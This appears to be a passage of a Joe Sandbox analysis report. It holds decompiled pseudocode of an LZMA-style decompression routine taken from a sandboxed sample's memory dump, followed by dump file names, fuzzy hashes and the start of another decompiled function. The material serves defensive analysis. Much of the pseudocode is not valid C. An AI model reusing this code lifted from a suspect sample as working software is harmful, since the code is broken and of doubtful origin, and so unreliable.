											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
